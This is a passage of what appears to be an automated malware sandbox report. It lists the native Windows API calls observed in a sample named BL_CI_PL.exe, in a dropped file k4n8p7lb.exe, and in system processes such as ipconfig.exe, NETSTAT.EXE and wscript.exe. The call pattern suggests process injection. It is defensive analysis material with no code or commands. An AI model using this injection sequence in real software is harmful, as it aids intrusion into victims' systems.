        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2ED0 NtResumeThread,LdrInitializeThunk,10_2_1E8F2ED0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2E50 NtCreateSection,LdrInitializeThunk,10_2_1E8F2E50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2F00 NtCreateFile,LdrInitializeThunk,10_2_1E8F2F00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2CF0 NtDelayExecution,LdrInitializeThunk,10_2_1E8F2CF0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2C30 NtMapViewOfSection,LdrInitializeThunk,10_2_1E8F2C30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2C50 NtUnmapViewOfSection,LdrInitializeThunk,10_2_1E8F2C50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2DA0 NtReadVirtualMemory,LdrInitializeThunk,10_2_1E8F2DA0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_1E8F2DC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2D10 NtQuerySystemInformation,LdrInitializeThunk,10_2_1E8F2D10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2B90 NtFreeVirtualMemory,LdrInitializeThunk,10_2_1E8F2B90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2BC0 NtQueryInformationToken,LdrInitializeThunk,10_2_1E8F2BC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2B10 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_1E8F2B10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F29F0 NtReadFile,LdrInitializeThunk,10_2_1E8F29F0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F34E0 NtCreateMutant,LdrInitializeThunk,10_2_1E8F34E0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2E80 NtCreateProcessEx,10_2_1E8F2E80
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2EC0 NtQuerySection,10_2_1E8F2EC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2E00 NtQueueApcThread,10_2_1E8F2E00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2FB0 NtSetValueKey,10_2_1E8F2FB0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2F30 NtOpenDirectoryObject,10_2_1E8F2F30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F3C90 NtOpenThread,10_2_1E8F3C90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2CD0 NtEnumerateKey,10_2_1E8F2CD0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2C10 NtOpenProcess,10_2_1E8F2C10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2C20 NtSetInformationFile,10_2_1E8F2C20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F3C30 NtOpenProcessToken,10_2_1E8F3C30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2D50 NtWriteVirtualMemory,10_2_1E8F2D50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2A80 NtClose,10_2_1E8F2A80
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2AA0 NtQueryInformationFile,10_2_1E8F2AA0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2AC0 NtEnumerateValueKey,10_2_1E8F2AC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2A10 NtWriteFile,10_2_1E8F2A10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2B80 NtCreateKey,10_2_1E8F2B80
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2BE0 NtQueryVirtualMemory,10_2_1E8F2BE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2B00 NtQueryValueKey,10_2_1E8F2B00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2B20 NtQueryInformationProcess,10_2_1E8F2B20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F38D0 NtGetContextThread,10_2_1E8F38D0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F29D0 NtWaitForSingleObject,10_2_1E8F29D0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F4570 NtSuspendThread,10_2_1E8F4570
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F4260 NtSetContextThread,10_2_1E8F4260
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A534E0 NtCreateMutant,LdrInitializeThunk,14_2_03A534E0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52B80 NtCreateKey,LdrInitializeThunk,14_2_03A52B80
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52B90 NtFreeVirtualMemory,LdrInitializeThunk,14_2_03A52B90
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52BC0 NtQueryInformationToken,LdrInitializeThunk,14_2_03A52BC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52A80 NtClose,LdrInitializeThunk,14_2_03A52A80
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A529F0 NtReadFile,LdrInitializeThunk,14_2_03A529F0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52FB0 NtSetValueKey,LdrInitializeThunk,14_2_03A52FB0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52F00 NtCreateFile,LdrInitializeThunk,14_2_03A52F00
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52E50 NtCreateSection,LdrInitializeThunk,14_2_03A52E50
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_03A52DC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52D10 NtQuerySystemInformation,LdrInitializeThunk,14_2_03A52D10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52CF0 NtDelayExecution,LdrInitializeThunk,14_2_03A52CF0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52C30 NtMapViewOfSection,LdrInitializeThunk,14_2_03A52C30
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A54260 NtSetContextThread,14_2_03A54260
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A54570 NtSuspendThread,14_2_03A54570
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52BE0 NtQueryVirtualMemory,14_2_03A52BE0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52B20 NtQueryInformationProcess,14_2_03A52B20
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52B00 NtQueryValueKey,14_2_03A52B00
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52B10 NtAllocateVirtualMemory,14_2_03A52B10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52AA0 NtQueryInformationFile,14_2_03A52AA0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52AC0 NtEnumerateValueKey,14_2_03A52AC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52A10 NtWriteFile,14_2_03A52A10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A529D0 NtWaitForSingleObject,14_2_03A529D0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A538D0 NtGetContextThread,14_2_03A538D0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52F30 NtOpenDirectoryObject,14_2_03A52F30
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52EB0 NtProtectVirtualMemory,14_2_03A52EB0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52E80 NtCreateProcessEx,14_2_03A52E80
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52EC0 NtQuerySection,14_2_03A52EC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52ED0 NtResumeThread,14_2_03A52ED0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52E00 NtQueueApcThread,14_2_03A52E00
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52DA0 NtReadVirtualMemory,14_2_03A52DA0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52D50 NtWriteVirtualMemory,14_2_03A52D50
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A53C90 NtOpenThread,14_2_03A53C90
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52CD0 NtEnumerateKey,14_2_03A52CD0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52C20 NtSetInformationFile,14_2_03A52C20
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A53C30 NtOpenProcessToken,14_2_03A53C30
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52C10 NtOpenProcess,14_2_03A52C10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52C50 NtUnmapViewOfSection,14_2_03A52C50
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F38690 NtReadFile,14_2_02F38690
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F38710 NtClose,14_2_02F38710
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F385E0 NtCreateFile,14_2_02F385E0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F3868D NtReadFile,14_2_02F3868D
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F3870A NtClose,14_2_02F3870A
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 23_2_02A82897 NtProtectVirtualMemory,23_2_02A82897
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 24_2_0000020622240D02 NtCreateFile,24_2_0000020622240D02
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 25_2_02BD2897 NtProtectVirtualMemory,25_2_02BD2897
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F34E0 NtCreateMutant,LdrInitializeThunk,26_2_1E8F34E0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2EB0 NtProtectVirtualMemory,LdrInitializeThunk,26_2_1E8F2EB0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2ED0 NtResumeThread,LdrInitializeThunk,26_2_1E8F2ED0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2E50 NtCreateSection,LdrInitializeThunk,26_2_1E8F2E50
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2F00 NtCreateFile,LdrInitializeThunk,26_2_1E8F2F00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2CF0 NtDelayExecution,LdrInitializeThunk,26_2_1E8F2CF0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2C30 NtMapViewOfSection,LdrInitializeThunk,26_2_1E8F2C30
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2C50 NtUnmapViewOfSection,LdrInitializeThunk,26_2_1E8F2C50
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2DA0 NtReadVirtualMemory,LdrInitializeThunk,26_2_1E8F2DA0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,26_2_1E8F2DC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2D10 NtQuerySystemInformation,LdrInitializeThunk,26_2_1E8F2D10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2B90 NtFreeVirtualMemory,LdrInitializeThunk,26_2_1E8F2B90
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2BC0 NtQueryInformationToken,LdrInitializeThunk,26_2_1E8F2BC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2B10 NtAllocateVirtualMemory,LdrInitializeThunk,26_2_1E8F2B10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F29F0 NtReadFile,LdrInitializeThunk,26_2_1E8F29F0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F3C90 NtOpenThread,26_2_1E8F3C90
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F3C30 NtOpenProcessToken,26_2_1E8F3C30
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F38D0 NtGetContextThread,26_2_1E8F38D0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2E80 NtCreateProcessEx,26_2_1E8F2E80
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2EC0 NtQuerySection,26_2_1E8F2EC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2E00 NtQueueApcThread,26_2_1E8F2E00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2FB0 NtSetValueKey,26_2_1E8F2FB0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2F30 NtOpenDirectoryObject,26_2_1E8F2F30
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2CD0 NtEnumerateKey,26_2_1E8F2CD0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2C10 NtOpenProcess,26_2_1E8F2C10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2C20 NtSetInformationFile,26_2_1E8F2C20
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2D50 NtWriteVirtualMemory,26_2_1E8F2D50
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2A80 NtClose,26_2_1E8F2A80
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2AA0 NtQueryInformationFile,26_2_1E8F2AA0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2AC0 NtEnumerateValueKey,26_2_1E8F2AC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2A10 NtWriteFile,26_2_1E8F2A10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2B80 NtCreateKey,26_2_1E8F2B80
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2BE0 NtQueryVirtualMemory,26_2_1E8F2BE0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2B00 NtQueryValueKey,26_2_1E8F2B00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2B20 NtQueryInformationProcess,26_2_1E8F2B20
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F29D0 NtWaitForSingleObject,26_2_1E8F29D0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F4570 NtSuspendThread,26_2_1E8F4570
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F4260 NtSetContextThread,26_2_1E8F4260
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F34E0 NtCreateMutant,LdrInitializeThunk,27_2_1E8F34E0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2EB0 NtProtectVirtualMemory,LdrInitializeThunk,27_2_1E8F2EB0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2ED0 NtResumeThread,LdrInitializeThunk,27_2_1E8F2ED0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2E50 NtCreateSection,LdrInitializeThunk,27_2_1E8F2E50
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2F00 NtCreateFile,LdrInitializeThunk,27_2_1E8F2F00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2CF0 NtDelayExecution,LdrInitializeThunk,27_2_1E8F2CF0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2C30 NtMapViewOfSection,LdrInitializeThunk,27_2_1E8F2C30
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2C50 NtUnmapViewOfSection,LdrInitializeThunk,27_2_1E8F2C50
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2DA0 NtReadVirtualMemory,LdrInitializeThunk,27_2_1E8F2DA0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,27_2_1E8F2DC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2D10 NtQuerySystemInformation,LdrInitializeThunk,27_2_1E8F2D10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2B90 NtFreeVirtualMemory,LdrInitializeThunk,27_2_1E8F2B90
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2BC0 NtQueryInformationToken,LdrInitializeThunk,27_2_1E8F2BC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2B10 NtAllocateVirtualMemory,LdrInitializeThunk,27_2_1E8F2B10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F29F0 NtReadFile,LdrInitializeThunk,27_2_1E8F29F0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F3C90 NtOpenThread,27_2_1E8F3C90
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F3C30 NtOpenProcessToken,27_2_1E8F3C30
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F38D0 NtGetContextThread,27_2_1E8F38D0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2E80 NtCreateProcessEx,27_2_1E8F2E80
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2EC0 NtQuerySection,27_2_1E8F2EC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2E00 NtQueueApcThread,27_2_1E8F2E00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2FB0 NtSetValueKey,27_2_1E8F2FB0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2F30 NtOpenDirectoryObject,27_2_1E8F2F30
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2CD0 NtEnumerateKey,27_2_1E8F2CD0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2C10 NtOpenProcess,27_2_1E8F2C10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2C20 NtSetInformationFile,27_2_1E8F2C20
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2D50 NtWriteVirtualMemory,27_2_1E8F2D50
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2A80 NtClose,27_2_1E8F2A80
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2AA0 NtQueryInformationFile,27_2_1E8F2AA0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2AC0 NtEnumerateValueKey,27_2_1E8F2AC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2A10 NtWriteFile,27_2_1E8F2A10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2B80 NtCreateKey,27_2_1E8F2B80
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2BE0 NtQueryVirtualMemory,27_2_1E8F2BE0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2B00 NtQueryValueKey,27_2_1E8F2B00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2B20 NtQueryInformationProcess,27_2_1E8F2B20
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F29D0 NtWaitForSingleObject,27_2_1E8F29D0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F4570 NtSuspendThread,27_2_1E8F4570
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F4260 NtSetContextThread,27_2_1E8F4260
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392B10 NtAllocateVirtualMemory,LdrInitializeThunk,28_2_03392B10
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392B00 NtQueryValueKey,LdrInitializeThunk,28_2_03392B00
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392B90 NtFreeVirtualMemory,LdrInitializeThunk,28_2_03392B90
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392B80 NtCreateKey,LdrInitializeThunk,28_2_03392B80
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392BC0 NtQueryInformationToken,LdrInitializeThunk,28_2_03392BC0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392A80 NtClose,LdrInitializeThunk,28_2_03392A80
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392AC0 NtEnumerateValueKey,LdrInitializeThunk,28_2_03392AC0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033929F0 NtReadFile,LdrInitializeThunk,28_2_033929F0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392F00 NtCreateFile,LdrInitializeThunk,28_2_03392F00
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392FB0 NtSetValueKey,LdrInitializeThunk,28_2_03392FB0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392E50 NtCreateSection,LdrInitializeThunk,28_2_03392E50
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392D10 NtQuerySystemInformation,LdrInitializeThunk,28_2_03392D10
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,28_2_03392DC0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392C30 NtMapViewOfSection,LdrInitializeThunk,28_2_03392C30
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033934E0 NtCreateMutant,LdrInitializeThunk,28_2_033934E0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03394260 NtSetContextThread,28_2_03394260
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03394570 NtSuspendThread,28_2_03394570
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392B20 NtQueryInformationProcess,28_2_03392B20
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392BE0 NtQueryVirtualMemory,28_2_03392BE0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392A10 NtWriteFile,28_2_03392A10
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392AA0 NtQueryInformationFile,28_2_03392AA0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033929D0 NtWaitForSingleObject,28_2_033929D0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392F30 NtOpenDirectoryObject,28_2_03392F30
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392E00 NtQueueApcThread,28_2_03392E00
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392EB0 NtProtectVirtualMemory,28_2_03392EB0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392E80 NtCreateProcessEx,28_2_03392E80
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392ED0 NtResumeThread,28_2_03392ED0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392EC0 NtQuerySection,28_2_03392EC0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392D50 NtWriteVirtualMemory,28_2_03392D50
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392DA0 NtReadVirtualMemory,28_2_03392DA0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392C20 NtSetInformationFile,28_2_03392C20
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392C10 NtOpenProcess,28_2_03392C10
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392C50 NtUnmapViewOfSection,28_2_03392C50
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392CF0 NtDelayExecution,28_2_03392CF0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392CD0 NtEnumerateKey,28_2_03392CD0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033938D0 NtGetContextThread,28_2_033938D0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03393C30 NtOpenProcessToken,28_2_03393C30
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03393C90 NtOpenThread,28_2_03393C90
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007E85E0 NtCreateFile,28_2_007E85E0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007E8690 NtReadFile,28_2_007E8690
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007E8710 NtClose,28_2_007E8710
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007E87C0 NtAllocateVirtualMemory,28_2_007E87C0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007E868D NtReadFile,28_2_007E868D
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007E870A NtClose,28_2_007E870A
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007E87C2 NtAllocateVirtualMemory,28_2_007E87C2
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52C30 NtMapViewOfSection,LdrInitializeThunk,29_2_04A52C30
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,29_2_04A52DC0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52D10 NtQuerySystemInformation,LdrInitializeThunk,29_2_04A52D10
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52E50 NtCreateSection,LdrInitializeThunk,29_2_04A52E50
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52F00 NtCreateFile,LdrInitializeThunk,29_2_04A52F00
